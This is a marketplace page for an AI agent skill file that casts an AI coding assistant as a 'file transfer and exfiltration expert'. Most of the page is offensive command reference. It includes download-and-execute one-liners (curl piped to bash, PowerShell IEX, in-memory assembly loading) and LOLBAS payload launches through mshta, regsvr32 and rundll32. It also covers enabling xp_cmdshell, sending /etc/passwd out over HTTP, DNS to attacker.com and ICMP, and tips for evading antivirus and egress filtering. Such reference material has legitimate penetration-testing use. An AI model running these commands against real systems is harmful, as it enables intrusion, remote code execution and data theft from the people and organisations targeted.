0X6C7879/file-transfer-techniques
skills/file-transfer-techniques/SKILL.md
Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
$ install --global
skillsauthnpx skillsauth add 0X6C7879/aegissec file-transfer-techniquesInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 22, 2026, 5:53 AM110.9s1 file scanned
SKILL.md
- name:
- file-transfer-techniques
- description:
- Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
File Transfer Techniques Skill
You are a file transfer and exfiltration expert. Use this skill when the user requests help with:
- Transferring files between systems
- Data exfiltration techniques
- Living-off-the-land file transfer methods
- Cross-platform file operations
- Encoding and obfuscation
- Bypassing egress filtering
- Establishing file servers
Core Methodologies
1. Linux File Download
wget:
# Basic download
wget http://10.10.10.10/file.txt
# Save with different name
wget http://10.10.10.10/file.txt -O output.txt
# Recursive download
wget -r http://10.10.10.10/directory/
# Download in background
wget -b http://10.10.10.10/largefile.zip
curl:
# Basic download
curl http://10.10.10.10/file.txt -o file.txt
curl -O http://10.10.10.10/file.txt # Keep original name
# Follow redirects
curl -L http://10.10.10.10/file.txt -o file.txt
# Download with auth
curl -u user:password http://10.10.10.10/file.txt -o file.txt
# Download multiple files
curl -O http://10.10.10.10/file[1-10].txt
Netcat:
# Receiver
nc -lvnp 4444 > file.txt
# Sender
nc 10.10.10.10 4444 < file.txt
# With progress (use pv)
nc -lvnp 4444 | pv > file.txt
pv file.txt | nc 10.10.10.10 4444
Base64 Encoding (for copy-paste):
# Encode on attacker machine
base64 file.txt > file.b64
cat file.b64 # Copy this
# Decode on target
echo "BASE64_STRING_HERE" | base64 -d > file.txt
# Or in one command
echo "BASE64STRING" | base64 -d > file.txt
Python HTTP Server (for hosting files):
# Python 3
python3 -m http.server 8000
# Python 2
python -m SimpleHTTPServer 8000
# Ruby
ruby -run -e httpd . -p 8000
# PHP
php -S 0.0.0.0:8000
2. Windows File Download
PowerShell:
# Invoke-WebRequest (PS 3.0+)
Invoke-WebRequest -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
iwr -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
# DownloadFile
(New-Object Net.WebClient).DownloadFile("http://10.10.10.10/file.exe", "C:\Temp\file.exe")
# DownloadString (download and execute)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
# Download and execute in memory
$data = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
certutil:
# Download file
certutil.exe -urlcache -split -f "http://10.10.10.10/file.exe" file.exe
# Alternative syntax
certutil -urlcache -f "http://10.10.10.10/file.exe" file.exe
# Clean cache
certutil.exe -urlcache * delete
bitsadmin:
# Download file
bitsadmin /transfer job /download /priority high http://10.10.10.10/file.exe C:\Temp\file.exe
# Verify and complete
bitsadmin /complete job
cmd.exe (VBS script):
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.10.10.10/file.exe file.exe
3. Linux File Upload/Exfiltration
HTTP POST:
# curl
curl -X POST -F "file=@/etc/passwd" http://10.10.10.10:8000/upload
# With auth
curl -X POST -F "[email protected]" http://10.10.10.10:8000/upload -u user:pass
# wget
wget --post-file=/etc/passwd http://10.10.10.10:8000/upload
SCP (if SSH available):
# Upload
scp file.txt [email protected]:/tmp/
# Download
scp [email protected]:/tmp/file.txt ./
# Recursive
scp -r directory/ [email protected]:/tmp/
# With key
scp -i id_rsa file.txt [email protected]:/tmp/
Netcat:
# Receiver (attacker)
nc -lvnp 4444 > received_file.txt
# Sender (target)
nc 10.10.10.10 4444 < file.txt
Socat:
# Receiver
socat TCP4-LISTEN:4444,fork file:received.txt
# Sender
socat TCP4:10.10.10.10:4444 file:file.txt
DNS Exfiltration:
# Encode data and send via DNS queries
for data in $(cat /etc/passwd | base64 | tr -d '=' | fold -w 32); do
dig $data.attacker.com @dns-server
done
# Receive on DNS server logs
ICMP Exfiltration:
# Send data in ICMP packets
cat file.txt | xxd -p -c 16 | while read line; do
ping -c 1 -p $line 10.10.10.10
done
# Receive with tcpdump
tcpdump -i eth0 icmp -X
4. Windows File Upload
PowerShell:
# Upload via HTTP POST
$file = Get-Content "C:\Temp\file.txt" -Raw
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $file
# Upload file object
$fileBytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.exe")
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $fileBytes
SMB:
# Copy to SMB share
copy C:\Temp\file.txt \\10.10.10.10\share\
# Map drive first
net use Z: \\10.10.10.10\share
copy C:\Temp\file.txt Z:\
FTP:
# Create FTP script
echo open 10.10.10.10 > ftp.txt
echo user username password >> ftp.txt
echo binary >> ftp.txt
echo put file.exe >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -s:ftp.txt
5. SMB File Transfer
Linux to Windows:
# Mount SMB share on Linux
smbclient //10.10.10.10/share -U username
# In smbclient:
put local_file.txt
get remote_file.txt
# Mount and copy
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
cp file.txt /mnt/smb/
Windows to Linux:
# Start Samba server on Linux
sudo smbserver.py share /tmp/share -smb2support
# From Windows
copy C:\file.txt \\10.10.10.10\share\
Impacket smbserver:
# On attacker (Linux)
sudo impacket-smbserver share /tmp/share -smb2support
sudo impacket-smbserver share /tmp/share -smb2support -username user -password pass
# On target (Windows)
# No auth
copy file.txt \\10.10.10.10\share\
\\10.10.10.10\share\file.exe
# With auth
net use \\10.10.10.10\share /user:user pass
copy file.txt \\10.10.10.10\share\
6. FTP File Transfer
Linux FTP Server:
# Python pyftpdlib
sudo python3 -m pyftpdlib -p 21 -w
# vsftpd (if installed)
sudo service vsftpd start
Windows FTP Client:
# Interactive
ftp 10.10.10.10
# Scripted
echo open 10.10.10.10 21 > ftp.txt
echo USER username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
7. Living Off The Land (LOLBAS/GTFOBins)
Windows LOLBAS:
# certutil (already shown)
certutil -urlcache -f http://10.10.10.10/file.exe file.exe
# mshta
mshta http://10.10.10.10/payload.hta
# regsvr32
regsvr32 /s /n /u /i:http://10.10.10.10/file.sct scrobj.dll
# rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/payload.ps1')")
Linux GTFOBins:
# See GTFOBins for specific binaries
# https://gtfobins.github.io/
8. Database Exfiltration
MySQL:
-- Write to file (requires FILE privilege)
SELECT * FROM users INTO OUTFILE '/tmp/users.txt';
SELECT LOAD_FILE('/etc/passwd') INTO OUTFILE '/tmp/passwd.txt';
-- Read from file
LOAD DATA INFILE '/tmp/data.txt' INTO TABLE users;
MSSQL:
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Use certutil to download
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.10.10/file.exe C:\Temp\file.exe';
PostgreSQL:
-- Write to file
COPY (SELECT * FROM users) TO '/tmp/users.txt';
-- Read from file
COPY users FROM '/tmp/data.txt';
-- Command execution to download
COPY (SELECT '') TO PROGRAM 'wget http://10.10.10.10/file.txt -O /tmp/file.txt';
9. Encoding/Obfuscation
Base64:
# Encode
base64 file.txt > file.b64
cat file.txt | base64
# Decode
base64 -d file.b64 > file.txt
cat file.b64 | base64 -d > file.txt
Hex Encoding:
# Encode
xxd -p file.txt > file.hex
hexdump -ve '1/1 "%.2x"' file.txt > file.hex
# Decode
xxd -r -p file.hex > file.txt
Gzip Compression:
# Compress
gzip file.txt # Creates file.txt.gz
# Decompress
gunzip file.txt.gz
Tar Archive:
# Create
tar -czf archive.tar.gz directory/
# Extract
tar -xzf archive.tar.gz
10. Persistence and Staging
Download and Execute:
# Linux
wget http://10.10.10.10/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh
# One-liner
curl http://10.10.10.10/script.sh | bash
# PowerShell
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')"
In-Memory Execution:
# PowerShell - never touches disk
$code = (New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
IEX $code
# Reflective DLL loading
$bytes = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.dll')
[System.Reflection.Assembly]::Load($bytes)
Quick Reference Commands
Start HTTP Server (Attacker):
python3 -m http.server 8000
sudo python3 -m http.server 80
Start SMB Server (Attacker):
sudo impacket-smbserver share /tmp/share -smb2support
Download on Target (Linux):
wget http://10.10.10.10:8000/file
curl http://10.10.10.10:8000/file -o file
Download on Target (Windows):
certutil -urlcache -f http://10.10.10.10:8000/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10:8000/file.exe','file.exe')"
Upload from Target:
# Linux
curl -X POST -F "[email protected]" http://10.10.10.10:8000/
nc 10.10.10.10 4444 < file.txt
# Windows
copy file.txt \\10.10.10.10\share\
Troubleshooting
Firewall Blocking:
- Try alternative ports (80, 443, 53)
- Use DNS/ICMP exfiltration
- Encode data and use allowed protocols
AV Detection:
- Encode/obfuscate payloads
- Use in-memory execution
- Split file into chunks
- Use legitimate tools (LOLBAS)
No Internet Access:
- Use local file shares (SMB, NFS)
- Use removable media if physical access
- Use database OUT FILE if database access
- Use local services (FTP, HTTP on internal network)
Reference Links
- LOLBAS Project: https://lolbas-project.github.io/
- GTFOBins: https://gtfobins.github.io/
- HackTricks File Transfer: https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/File%20Transfer.md
When to Use This Skill
Activate this skill when the user asks to:
- Transfer files between systems
- Download files to compromised systems
- Exfiltrate data from targets
- Set up file servers for attacks
- Bypass egress filtering
- Use living-off-the-land techniques
- Encode or obfuscate file transfers
- Help with data staging
Always ensure proper authorization before transferring files to/from any system.
Related Skills
0X6C7879/wooyun-legacy
development
VerifiedTrustedCommunity
WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/windows-privilege-escalation
tools
VerifiedTrustedCommunity
Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/tunnel
development
VerifiedTrustedCommunity
Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/threat-modeling
development
VerifiedTrustedCommunity
Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.
2SKILL.mdUpdated Apr 22, 2026